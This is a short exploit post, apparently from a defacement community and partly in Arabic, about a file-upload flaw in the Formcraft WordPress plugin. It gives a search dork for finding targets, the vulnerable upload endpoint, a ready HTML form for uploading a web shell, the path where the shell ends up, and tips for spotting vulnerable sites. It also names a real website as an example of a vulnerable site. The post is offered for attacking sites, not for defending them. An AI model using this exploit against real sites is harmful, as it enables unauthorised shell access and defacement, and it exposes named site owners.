"powered by Formcraft" Deface exploit wp upload

1. Formcraft
2.  
3. ^_^
4.  
5. - Dork : "powered by Formcraft"
6.  
7. About 26,700
8.  
9. - Vuln : {"failed":"No file found 2"}
10.  
11. - Exploit : wp-content/plugins/formcraft/file-upload/server/php/upload.php
12.  
13. - Your Accses Shell / File : wp-content/plugins/formcraft/file-upload/server/php/files/[randomcode]nameshell.php
14.  
15. - الاستغلال :
16.  
17. <form method="POST" action="target.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
18. enctype="multipart/form-data">
19. <input type="file" name="files[]" /><button>Upload</button>
20. </form>
21.  
22. نحفظه بصيغة html
23.  
24. نشوف كيفية معرفة الاصابة في الموقع
25.  
26. الصفحة بيضاء ==> الموقع ليس مصاب
27.  
28. توجد ايضا مواقع مصابة لكن لا تقبل رفع الشل مثل هذا الموقع
29.  
30. http://www.sunnyhill.org/
31.  
32. الموقع لم يقبل رفع الشل
33.  
34. {"failed":"Not writable"}